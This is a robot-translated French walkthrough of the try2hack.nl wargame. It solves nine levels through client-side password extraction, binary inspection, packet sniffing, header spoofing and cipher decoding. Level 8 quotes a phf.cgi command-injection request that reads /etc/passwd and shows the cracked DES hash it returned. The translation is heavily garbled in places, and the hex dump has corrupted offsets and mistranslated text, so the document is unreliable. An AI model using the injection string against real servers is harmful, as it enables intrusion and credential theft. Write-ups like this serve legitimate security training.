This page has been robot translated, sorry for typos if any. Original content here.

Abréviations de réseau


Il y a quelques jours (13.06.02), un cupcake m'a jeté une URL sur http://www.try2hack.nl/level1.ht , me disant de vérifier votre force. J'avoue que chaque tâche sur ce site était difficile à sa manière, mais en même temps, c'est intéressant. Toute personne qui n'a pas réussi ce test, je recommande fortement d'essayer. Bien, cependant, ceux qui ont déjà essayé le bien-être n’ont jamais atteint la 10ème tâche, lisez cet article =)
Eh bien, commençons. Je dirai tout de suite que je décrirai les solutions du courant aux 9 tâches principales, je ne deviendrai en détail que précisément celles complexes qui sont aussi intéressantes.

# 1.

Élémentaire. Voici une source pour la vérification du mot de passe js:
  <SCRIPT LANGUAGE = "JavaScript">
 fonction Try (passwd) {
 if (passwd == "hackerzzz") {
 alert ("Très bien! Au niveau 2 ...");
 location.href = "levvel2.html";
 }
 sinon {
 alert ("Le mot de passe est incorrect. Veuillez ne plus essayer.");
 location.href = "http://www.disney.com";
 };
 }
 </ SCRIPT> 
Dans la troisième ligne, la valeur entrée est comparée au mot "hackerzzz", qui joue ici le rôle d'un mot de passe.

# 2.

J'avoue que dans mon regard, la tâche m'a semblé compliquée. Je me suis trompé =)
Remplissez le lecteur flash, ouvrez-le avec un bloc-notes (vous pouvez utiliser un éditeur hexadécimal) et tout en bas (adresses 00000440-00000490), vous pouvez voir:
txtUsername ...... Try2Hack.I .... txtPassword ...... NokiaIsGood.I .......... LLeVeLL3.html
Connexion Try2Hack
Mot de passe NokiaIsGood
Suivant Tâche LLeVeLL3.html

# 3.

Très spirituel est aussi une tâche intéressante.
Voici la source js'a:
  <SCRIPT language = "JavaScript">
 pwd = prompt ("Veuillez saisir le mot de passe pour le niveau 3:", "");
 if (pwd == PASSWORD) {
 alert ("Très bien! \ nEntering Level 4 ...");
 location.href = CORRECTSITE;
 } sinon
 {
 alert ("FAUX! \ nRetour à Disneyland !!!");
 location.href = WRONGSITE;
 }
 MOT DE PASSE = "AbCdE";
 CORRECTSITE = "level4.html";
 WRONGSITE = "http://www.disney.com";
 </ SCRIPT> 
Il semblerait que le mot de passe est "AbCdE", mais comment peut-il fonctionner s'il est déterminé à la fin? Cependant, la variable PASSWORD au moment du test était déjà définie pour une raison quelconque, sinon l'interpréteur donnerait une erreur "PASSWORD: no definition". De plus, seulement après 20 minutes. hésiter, la ligne se précipita dans les yeux:
<SCRIPT src = "JavaScript"> </ SCRIPT>
Je n'aurais pas pu penser que "javascript" est un fichier =))). Il avait aussi une fois des valeurs vraies de variables:
PASSWORD = "TheCorrectAnswer";
CORRECTSITE = "thelevel4.html";
WRONGSITE = "http://www.disney.com";

# 4.

En ramassant l'applet, les soins ont attiré les lignes au 00000A60-00000A80. L'applet a lu les lignes du fichier * level4 * (en conséquence, le dasmasor l'a confirmé). C'était probablement un fichier de mot de passe. La chose la plus intéressante est qu'il a continué à agir avec ma vis. Cela mange, le fichier * level4 * était soit sur internet, soit sur mon ordinateur. Et si sur mon, à quel endroit? Correctement, soit dans le cookie, soit dans Temp'ah. Après avoir nettoyé également ceux-ci, ainsi que d’autres, nous sommes arrivés à la page avec une applet. Une paire de fichiers est apparue dans les tempos, l'un d'entre eux étant level4 [2] .txt.
Contenu:
5_level_5.html
Try2hack
AppletsAreEasy
Au fait, à l'intérieur de l'applet de suppression de l'œil se trouvait ceci: "txtUsername = AlmostAHacker ..... txtPassword = ZqrE01A2d" Heathoo =)
/ * Gr33tz 2 filleul * /

# 5.

Il est proposé de télécharger le fichier level5.exe. Il est nécessaire de saisir le nom d'utilisateur et le mot de passe, qui sont évidemment stockés dans le fichier lui-même. L'ayant ouvert avec un sortilège, je me suis précipité dans les yeux:
http: //www.try2hack.f2s.com/login-level6.html ..... txtUsername = AlmostAHacker ..... txtPassword = ZqrE01A2d
Adresse: 000019F0-00001A50.
Trop facile, j'ai pensé. De plus, les mots de passe ne correspondaient pas. Vient ensuite désassembleur =):
Connexion Try2Hack
Mot de passe OutOfInspiration
Suivant niveau de tâche-6.html
/ * gr33tz 2 a3oX =) * /

# 6.

Tâche très déroutante. Encore une fois, blah blah, vous êtes invité à télécharger un programme qui se connecte à votre serveur et vérifie également la validité des données saisies. Ce jour-là, les créateurs ont honnêtement averti: "ce n'est pas le niveau 5, vous ne pouvez pas décompiler cet exe."
L'aide est venue SpyNet sniffer. Je ne décrirai pas comment nous avons fait quoi (un article séparé est nécessaire), je posterai uniquement le package qui vous intéresse:
  0000: 44 45 53 54 00 00 20 53 52 43 00 00 08 00 45 00 DEST .. SRC .... E.
 0010: 02 40 5F 78 40 00 71 06 14 E0 D5 13 8C 02 C2 57. @ _ X @ .q ........ W
 0020: 6F F2 00 50 04 AE EC 04 FD 8C 1A 9A 11 B0 50 10 o..P .......... P.
 0030: 40 7C AE D3 00 00 48 54 54 50 50 2F 31 2E 31 20 32 @ | .... HTTP / 1.1 2
 0040: 30 30 20 4F 4B 0D 0A 44 61 74 65 3A 20 53 75 6E 00 OK..Date: Dim
 0050: 2C 20 31 34 20 41 70 72 20 20 30 30 32 20 31 38, 14 avril 2002 18
 0060: 3A 32 32 3A 35 35 20 47 4D 54 0D 0A 53 65 72 76: 22: 55 GMT..Serv
 0070: 65 72 3A 20 41 70 61 63 68 65 0D 0A 43 61 63 68 er: Apache..Cach
 0080: 65 2D 43 6F 6E 74 72 6F 6C 3A 20 6D 61 78 2D 61 Contrôle électronique: max-a
 0090: 67 65 3D 36 30 34 38 30 30 0D 0A 45 78 70 69 72 ge = 604800..Expir
 00A0: 65 73 3A 20 53 75 6E 2C 20 32 31 20 41 70 72 20: dimanche, 21 avril 
 00B0: 32 30 30 32 20 31 38 3A 32 32 3A 35 35 20 47 4D 2002 18:22:55 GM
 00C0: 54 0D 0A 4C 61 73 74 2D 4D 6F 64 69 66 69 65 64 T..Dernière modification
 00H0: 3A 20 57 65 64 2C 20 31 38 20 41 70 72 20 32 30: mer 18 avr 20
 00E0: 30 31 20 31 35 3A 32 38 3A 30 30 20 47 4D 54 0D 01 15:28:00 GMT.
 00F0: 0A 45 54 61 67 3A 20 22 30 2D 63 63 2D 33 33 61 64 .ETag: "0-cc-3ad
 0100: 64 62 32 38 30 22 0D 0A 41 63 63 65 70 74 2D 52 db280 ".. Accept-R
 0110: 61 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 43 6F anges: octets..Co
 0120: 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 30 Longueur de la tente: 20
 0130: 34 0D 0A 4B 65 65 70 2D 41 6C 69 76 65 3A 20 74 4..Keep Alive: t
 0140: 69 6D 65 6F 75 74 3D 31 35 2C 20 6D 61 78 3D 31 imeout = 15, max = 1
 0150: 30 30 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 00..Connexion: 
 0160: 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 6F 6E 74 Keep-Alive..Cont
 0170: 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 70 ent-Type: texte / p
 0180: 6C 61 69 6E 0D 0A 0D 0A 00 28 45 4E 43 52 59 50 restés ..... (CRYPTER
 0190: 54 49 4F 4E 20 54 59 50 45 29 0D 0A 42 2A 43 2A TION TYPE) .. B * C *
 01A0: 4E 2A 2A 4E 0D 0A 0D 0A 28 55 53 45 52 4E 41 4D N ** N .... (USERNAM
 01B0: 45 29 0D 0A 61 62 61 62 61 20 61 62 62 61 61 62 20 E) .. ababa abbab 
 01C0: 62 61 61 61 61 20 61 61 61 62 62 0D 0A 0D 0A 28 baaaa aaabb .... (
 01D0: 50 41 53 53 57 4F 52 44 29 0D 0A 61 62 61 62 61 PASSWORD) .. ababa
 01E0: 20 61 61 61 61 61 61 61 61 62 62 61 61 20 61 62 62 aaaaa abbaa abb
 01F0: 62 61 20 61 61 61 61 61 60 62 61 61 61 61 20 62 ba aaaaa baaaa b
 0200: 61 61 62 61 20 62 61 62 62 61 0 0 0 0 0 0 28 0 aaba babba .... (P
 0210: 41 47 45 29 0D 0A 61 62 61 62 61 20 61 61 62 61 61 AGE) .. ababa aaba
 0220: 61 20 62 61 61 62 62 20 20 61 61 62 61 61 20 61 62 a baabb aabaa ab
 0230: 61 62 61 20 62 61 61 61 62 20 61 61 61 61 61 61 20 aba baaab aabaa 
 0240: 62 61 61 62 62 20 20 61 61 62 61 61 20 61 62 baabb aabaa ab
Légèrement recadré (vous essayez de le copier à partir de SpyNet), mais le partage principal (mot de passe, login, page) est bien visible. Il semblerait que la leçon soit terminée, mais non. Toutes les données ont été cryptées: - /
(NOM D'UTILISATEUR) .. ababa abbab baaaa aaabb ....
(MOT DE PASSE) .. ababa aaaaa abbaa abbba aaaaa baaaa baaba babba ....
J’ai pris JohnTheRipper'a a aussi commencé à casser ... blague =)) C’était l’algorithme de Bacon. Un algorithme électronique complet, même sans cryptage, mais codant:
aaaaa = a
aaaab = b
aaaba = c
aaabb = d
etc.
Le résultat du décodage manuel était:
Login SEIGNEUR
Paz LANPARTY
LEVELSEVEN.html page
Apprendre l'informatique, enfants =)
/ * gr33tz 2 D4rkGr3y;) * /

# 7.

Dan naughty pearl script level7.pl. Devoir: lui faire croire que:
1) la page à partir de laquelle nous sommes arrivés sur le site: http://www.microsoft.com/ms.htm
2) nous utilisons le navigateur Microsoft Internet Explorer 6.72
3) Système d'exploitation UNIX / LINUX
En général, la tâche est facile, il suffit de générer une telle requête http, dont l'en-tête contiendra ces informations. C'est:
Référent: http://www.microsoft.com/ms.htm
Agent utilisateur: MSIE 6.72
Mais avec l'axe d'un petit problème. Dans l'en-tête, il n'y a pas de champ dans lequel le type de système d'exploitation est explicitement indiqué. Il est généralement extrait de l'agent utilisateur. En espérant que le level7.pl fonctionne de cette façon, nous avons esquissé un script nacré indiquant que la requête suivante a été envoyée:
GET /cgi-bin/level7.pl HTTP / 1.0
Référent: http://www.microsoft.com/ms.htm
Agent utilisateur: MSIE 6.72 (UNIX / LINUX)
Accepter: * / *

Et oups =)
<A HREF="../Level-8.html"> Niveau 8 </A>

# 8.

Immédiatement attiré le nom du script de traitement phf.cgi. Je me souviens que beaucoup de piratage était sur sa conscience. Poryskav sur la piste de bug, a trouvé un radeau:
/cgi-bin/phf.pp?Qalias=x%0a/bin/cat%20/etc/passwd
La réponse était:
BuiZe: Bu3kOx4cCMX2U
Le mot de passe est crypté avec le DES simple. JTR a mis 15 minutes à apprendre. Qui, peut-être, je ne serai pas distribué de quelque manière que ce soit, qui en a besoin - déchiffrer =)

# 9.

Sur la page de tâche, il y a une inscription:
Nouveau message pour BuiZe:

Niveau 8 terminé!
Allez à irc. <*>. Org et rejoignez # <*>
Il tapez / msg <*> commencer

En d'autres termes, le champ de bataille est transféré à Irk. Le nom du serveur, le canal et le bot, nous avons caché pour des raisons évidentes (espérons tous).

# 9.

se compose de nombreuses mini-tâches.
Nous allons à eux sur le canal # Try2Hack.
Écriture "/ msg Try2Hack perfect-start"
Eh bien, aussi ce bla bla il nous donnera? et ceci:
-TRY2HACK- Bienvenue dans try2hack niveau 9! Décodez les lignes suivantes pour continuer:
-TRY2HACK- Wbva # gel2unpx.yriry9. Gb trg gur xrl lbh arrq gb qrpbqr gur sbyybjvat yvar:
-TRY2HACK- GTI2Mjj5YJ15DxVmERy1rQIZ =
-TRY2HACK- Tbbq yhpx, à partir de lbh ba # gel2unpx.yriry9.
vous chiffrer ... faiblement? Eh bien, à ce moment-là, nous ne nous moquerons de rien:
http://www.degraeve.com/cgi-bin/rot13.cgi
donc nous avons aussi déchiffré que bla bla bla nous avons eu:
Rejoignez # try2hack.level9. Pour obtenir la clé que vous souhaitez décoder la ligne suivante:
TGV2ZWw5LW15QkIzREl1eDVM =
Bonne chance et à bientôt sur # try2hack.level9.
nous commençons à paniquer et nous ne savons pas. pour quoi?
TGV2ZWw5LW15QkIzREl1eDVM =
hmm, du point de vue principal, il me semblait que tout était difficile, mais nous nous sommes souvenus, nous construisons / scripts Mirho / echo $ decode (TGV2ZWw5LW15QkIzREl1eDVM =, m), nous obtenons également Level9-myBB3DIux5L, ce sera notre manière, nous allons également recevoir une note
-LEVEL9-XXX- Bienvenue, je suis try2hack Level9! Décodez la ligne suivante pour continuer:
-LEVEL9-XXX- 010011100110100101100011011001010010000001101010011011 ...
vieux binaire bonhomme ... si vous ne voulez pas déchiffrer manuellement, eh bien
http://www.nickciske.com/binary/index.php
nous obtenons "Beau travail. Maintenant, tapez '/ msg TRY2HACK showbug' pour voir le bogue"
Eh bien, gribouiller / msg TRY2HACK showbug illustre aussi le bogue lui-même
-TRY2HACK- ovaq pgpe - CVAT pgpe: cvatercyl
-TRY2HACK- Cebp pgpe: cvatercyl {avpx hubfg unaq qrfg xrl net} {
-TRY2HACK- frg qhe [rkce [havkgvzr] - $ net]
-TRY2HACK- chgfrei "ABGVPR $ avpx: Lbhe cvat ercyl gbbx $ qhe frpbaqf"}
Ooo il n'y a pas encore, il est cousu bien, nous utilisons à nouveau le linker ci-dessus qui a oublié%) ... déchiffré .... Mais voici aussi un bug ... nous sommes dans cette pièce aussi accro si quelqu'un fabrique du savon Skinte sur neon@balticum-tv.lt .
Nous remercions NeoN pour la solution de la neuvième tâche =)

Publié par: D4rkGr3y


Matériel publié avec l'autorisation de DHGROUP (http://www.dhgroup.org)